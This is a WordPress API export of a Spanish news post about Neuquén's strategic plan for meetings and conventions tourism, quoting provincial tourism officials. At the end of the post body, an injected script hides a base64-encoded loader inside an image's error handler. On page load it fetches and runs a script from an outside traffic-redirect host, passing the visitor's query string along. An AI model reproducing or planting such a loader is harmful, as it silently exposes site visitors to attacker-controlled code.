{"id":9816,"date":"2025-07-30T11:02:08","date_gmt":"2025-07-30T14:02:08","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=9816"},"modified":"2025-08-13T15:25:10","modified_gmt":"2025-08-13T18:25:10","slug":"el-turismo-de-reuniones-es-un-eje-estrategico-en-neuquen","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=9816","title":{"rendered":"El turismo de reuniones es un eje estrat\u00e9gico en Neuqu\u00e9n"},"content":{"rendered":"\n<p><strong><em>La participaci\u00f3n de los actores del sector ser\u00e1 fundamental para seguir construyendo, de manera conjunta, un Neuqu\u00e9n cada vez m\u00e1s preparado para recibir eventos nacionales e internacionales.<\/em><\/strong><\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright size-full is-resized\"><a href=\"https:\/\/www.termatalia.com\/\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"873\" height=\"692\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes.jpeg\" alt=\"\" class=\"wp-image-9804\" style=\"width:275px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes.jpeg 873w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-300x238.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-768x609.jpeg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-696x552.jpeg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-530x420.jpeg 530w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-320x254.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-480x380.jpeg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/paquetesredes-800x634.jpeg 800w\" sizes=\"(max-width: 873px) 100vw, 873px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-green-cyan-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Con la presencia de autoridades provinciales, referentes del sector privado y especialistas en turismo, se present\u00f3 en la ciudad de Neuqu\u00e9n el Plan Operativo y Estrat\u00e9gico para el Turismo de Reuniones. El evento se llev\u00f3 a cabo en el Centro de Convenciones y Exposiciones Domuyo, y marc\u00f3 un paso clave en la consolidaci\u00f3n del segmento MICE (reuniones, incentivos, congresos y exposiciones) en el territorio provincial.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n, la consultora especializada en turismo de reuniones,&nbsp;<strong>Emora Franco<\/strong>, expuso los ejes principales del plan, que busca fortalecer la promoci\u00f3n, la articulaci\u00f3n p\u00fablico-privada y la profesionalizaci\u00f3n del sector, con una mirada sustentable y de largo plazo.<\/p>\n\n\n\n<p>De la presentaci\u00f3n, encabezada por el ministro de Turismo,&nbsp;<strong>Gustavo Fern\u00e1ndez Capiet<\/strong>; participaron la subsecretaria de Turismo,&nbsp;<strong>Silvana Cerda<\/strong>; el presidente de NeuquenTur,&nbsp;<strong>Sergio Sciaccitano<\/strong>&nbsp;y el presidente del Ente Provincial de Termas,&nbsp;<strong>Mat\u00edas Ramos<\/strong>.<\/p>\n\n\n\n<p>El ministro de Turismo, valor\u00f3 el trabajo realizado y destac\u00f3 el potencial del segmento para diversificar la oferta tur\u00edstica: \u201c<em>Esta es una l\u00ednea de trabajo prioritaria para la provincia. El turismo de reuniones nos sirve a todos: potencia la cadena de valor, genera consumo y es una puerta de entrada para que quienes nos visitan por trabajo luego nos elijan para vacacionar\u201d,<\/em>&nbsp;afirm\u00f3.<\/p>\n\n\n\n<p>El plan est\u00e1 dirigido a prestadores de servicios tur\u00edsticos, autoridades locales, c\u00e1maras, asociaciones y a todas las personas interesadas en impulsar este segmento estrat\u00e9gico para el desarrollo provincial. Entre los objetivos principales, se busca posicionar a Neuqu\u00e9n como un destino competitivo y sostenible para la captaci\u00f3n de eventos nacionales e internacionales.<\/p>\n\n\n\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1.webp\"><img decoding=\"async\" width=\"768\" height=\"512\" data-id=\"9817\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1.webp\" alt=\"\" class=\"wp-image-9817\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-1-480x320.webp 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2.webp\"><img decoding=\"async\" width=\"768\" height=\"512\" data-id=\"9818\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2.webp\" alt=\"\" class=\"wp-image-9818\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/sm-2-480x320.webp 480w\" sizes=\"(max-width: 768px) 100vw, 768px\" \/><\/a><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><a href=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md.webp\"><img decoding=\"async\" width=\"992\" height=\"661\" data-id=\"9819\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md.webp\" alt=\"\" class=\"wp-image-9819\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md.webp 992w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-300x200.webp 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-768x512.webp 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-696x464.webp 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-630x420.webp 630w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-320x213.webp 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-480x320.webp 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/md-800x533.webp 800w\" sizes=\"(max-width: 992px) 100vw, 992px\" \/><\/a><\/figure>\n<\/figure>\n\n\n\n<p>Sciacchitano, remarc\u00f3 la importancia de trabajar de manera articulada con todos los sectores:&nbsp;<em>\u201cDurante estos meses se hizo un gran trabajo en territorio con el Bur\u00f3 de San Mart\u00edn de los Andes, Villa La Angostura y Neuqu\u00e9n. La provincia tiene una oferta s\u00f3lida y diversa para crecer en este segmento, y contamos con el acompa\u00f1amiento del sector privado, las asociaciones y las universidades\u201d,<\/em>&nbsp;se\u00f1al\u00f3.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft size-large is-resized\"><a href=\"https:\/\/www.unrn.edu.ar\/eventos\/-2708\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"723\" height=\"1024\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-723x1024.jpg\" alt=\"\" class=\"wp-image-9815\" style=\"width:184px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-723x1024.jpg 723w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-212x300.jpg 212w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-768x1087.jpg 768w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-696x985.jpg 696w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-297x420.jpg 297w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-320x453.jpg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-480x680.jpg 480w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua-800x1133.jpg 800w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/neua.jpg 904w\" sizes=\"(max-width: 723px) 100vw, 723px\" \/><\/a><figcaption class=\"wp-element-caption\"><em><sup><mark class=\"has-inline-color has-vivid-cyan-blue-color\">Publicidad:<\/mark><\/sup><\/em><\/figcaption><\/figure>\n<\/div>\n\n\n<p>Entre las acciones ya impulsadas, se destac\u00f3 la postulaci\u00f3n de Neuqu\u00e9n como sede del Congreso Nacional de Agentes de Viajes, adem\u00e1s de la pr\u00f3xima realizaci\u00f3n del Congreso de J\u00f3venes Emprendedores en Turismo.<\/p>\n\n\n\n<p>El plan contempla tambi\u00e9n la expansi\u00f3n del segmento hacia destinos emergentes como Villa Pehuenia, Caviahue-Copahue, el norte neuquino y Jun\u00edn de los Andes, con potencial para atraer eventos corporativos e incentivos empresariales.<\/p>\n\n\n\n<p>Neuqu\u00e9n viene participando activamente en las principales ferias nacionales e internacionales del segmento. Estas acciones permitieron posicionar a la provincia como un destino atractivo para organizadores del sector.<\/p>\n\n\n\n<p>Con m\u00e1s de 100 vuelos semanales y una infraestructura en crecimiento, Neuqu\u00e9n se proyecta como un polo estrat\u00e9gico para el turismo de reuniones en la Patagonia y el pa\u00eds. La implementaci\u00f3n de este plan refuerza el compromiso del Gobierno provincial con el desarrollo tur\u00edstico como motor de empleo, inversi\u00f3n y crecimiento sostenible.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><a href=\"https:\/\/www.neuqueninforma.gob.ar\/noticias\/2025\/07\/30\/250465-el-turismo-de-reuniones-es-un-eje-estrategico-en-neuquen\" target=\"_blank\" rel=\" noreferrer noopener\"><img decoding=\"async\" width=\"596\" height=\"183\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_30-7-2025_105820_www.neuqueninforma.gob_.ar_.jpeg\" alt=\"\" class=\"wp-image-9820\" style=\"width:212px;height:auto\" srcset=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_30-7-2025_105820_www.neuqueninforma.gob_.ar_.jpeg 596w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_30-7-2025_105820_www.neuqueninforma.gob_.ar_-300x92.jpeg 300w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_30-7-2025_105820_www.neuqueninforma.gob_.ar_-320x98.jpeg 320w, https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2025\/07\/Captura-de-pantalla_30-7-2025_105820_www.neuqueninforma.gob_.ar_-480x147.jpeg 480w\" sizes=\"(max-width: 596px) 100vw, 596px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La participaci\u00f3n de los actores del sector ser\u00e1 fundamental para seguir construyendo, de manera conjunta, un Neuqu\u00e9n cada vez m\u00e1s preparado para recibir eventos nacionales e internacionales. Con la presencia de autoridades provinciales, referentes del sector privado y especialistas en turismo, se present\u00f3 en la ciudad de Neuqu\u00e9n el Plan Operativo y Estrat\u00e9gico para el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":9821,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[21],"tags":[],"class_list":["post-9816","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-patagonia"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9816","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9816"}],"version-history":[{"count":4,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9816\/revisions"}],"predecessor-version":[{"id":9880,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/9816\/revisions\/9880"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/9821"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9816"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9816"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9816"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}